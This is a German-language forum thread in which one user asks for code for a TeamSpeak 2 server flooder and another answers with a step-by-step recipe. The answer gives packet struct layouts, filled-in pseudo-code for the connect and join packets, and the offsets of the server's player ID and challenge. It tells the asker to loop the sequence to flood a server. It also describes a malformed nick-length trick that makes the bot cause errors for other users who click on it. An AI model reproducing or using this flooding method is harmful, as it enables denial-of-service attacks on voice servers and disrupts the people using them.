TS Flooder Code

[PoPoloch]

Hey könnte mir vielleicht jemand erklären oder einen code posten wie man einen ts flooder in vb oder vb.net programiert? sowas wie der easy ts flooder blos ohne backdoor

[blackberry]

Meine VB 'skills' sind ein wenig eingerostet, aber ich will mal versuchen
es dir allgemein verständlich zu machen.
Das ganze wurde nicht von mir herausgefunden sondern von Luigi Auriemma und
ich habe das lediglich aus seinem tspeakfp Quellcode (+ ein paar Emails an ihn xD)


1.
Verbindung herstellen (UDP-Verbindung)

2.
Um einen bot verbinden zu lassen musst du 2 pakete senden und die
Informationen aus dem erhaltenen paket vom server nach paket 1 verwenden

Paket A
-------
Größe: 180 [Bytes]
Aufbau:
struct ts2_version
{
short major;
short minor;
short build;
short revision;
}; // gesammt: 8 Bytes
struct ts2_connect
{
short header1;
short header2;
int challenge;
int playerid;
int seq;
unsigned long crc32;
char length1;
char client[29];
char length2;
char os[29];
struct ts2_version ver;
short options;
char length3;
char nick[29];
char length4;
char pass[29];
char length5;
char login[29];
}; // gesammt: 180 Bytes
SHORT 2 Bytes
INT 4 Bytes
unsigned long 4 Bytes
char 1 Byte
char abc[x] X Bytes
Jetzt wird das ganze ausgefüllt (um das übersichtlich für nicht-C Programmier zu halten
benutze ich hier nur pseudo-code)
// Version
version.major = 2
version.minor = 0
version.build = 32
version.revision = 60
// Paket
paket.header1 = 0xbef4
paket.header2 = 3
paket.challenge = 0
paket.playerid = 0
paket.seq = 1
paket.crc32 = 0 // erstmal mit nichts füllen
paket.length1 = 9 // Länge von paket.client (Zeichenzahl)
paket.client = "TeamSpeak"
paket.length2 = 5 // Länge von paket.os (Zeichenzahl)
paket.os = "Linux"
paket.ver = version // von vorher
paket.options = 0x0201 // 0x0201 = benutze account // 0x0101 = anonymer user
paket.length3 = 3 // Länge von paket.nick (Zeichenzahl)
paket.nick = "Bot"
paket.length4 = 10 // Länge von paket.pass (Zeichenzahl)
paket.pass = "ZH%Zz58ikJ"
paket.length5 = 8 // Länge von paket.login (Zeichenzahl)
paket.login = "testuser"
paket.crc32(paket) // Checksumme für das ganze Paket berechnen

Falls du noch bei paket.length3 eine größere Zahl als die echte Länge des nicks setzt,
dann hat der bot die Eigenschaften vom Free-Hack-client (Fehler beim ankilicken).
Das sendest du dann an den server.

Paket B (vom Server)
--------------------
Der Server sendet dann sein Paket (enthällt version, wilkommensnachricht, playerid, challenge, ...)
Der Speicher in den das Paket eingelesen wird sollte ca. 200 Bytes groß sein. (minimal 176 Bytes)
Wichtig sind dabei nur playerid und challenge (beide jeweils vom typ INT also 4 Bytes lang).
PlayerID beginnt beim Paket nach den esten 8 Bytes und ist (wie son gesagt) 4 Bytes lang
Challenge beginnt bim Paket nach den ersten 172 Bytes (und ist 4 Bytes lang).

Paket C
-------
Größe: 120 [Bytes]
Aufbau:
struct teamspeak_join
{
short header1;
short header2;
int challenge;
int playerid;
int seq;
int frag;
unsigned long crc32;
short fill;
char length1;
unsigned char joinchan[29];
char length2;
unsigned char joinsubchan[29];
char length3;
unsigned char joinchanpass[29];
int bandwidth;
};
Hier wieder mein Pseudo-code
paket.header1 = 0xbef0;
paket.header2 = 5;
paket.challenge = CHALLENGE_AUS_PAKET_B;
paket.playerid = PLAYERID_AUS_PAKET_B;
paket.seq = 1;
paket.frag = 0;
paket.crc32 = 0;
paket.length1 = 0 // Länge von paket.login (Zeichenzahl);
paket.joinchan = ""; // nichts ausgefüllt -> Default Channel
paket.length2 = 0; // Länge von paket.joinsubchan (Zeichenzahl)
paket.joinsubchan = "";
paket.length3 = 0; // Länge von paket.joinchanpass (Zeichenzahl)
paket.joinchanpass = "";
paket.bandwidth = 0;
paket.crc32(paket) // Checksumme für das ganze Paket berechnen


Dann nur noch senden und der Player sollte ganze 2 Sekunden lang im TS sein
Wenn du flooden willst setze das dann einfach in eine Schleife.



Ich hoffe das war gut genug beschrieben,
viel Spaß beim programmieren.


mfG.
-BlackBerry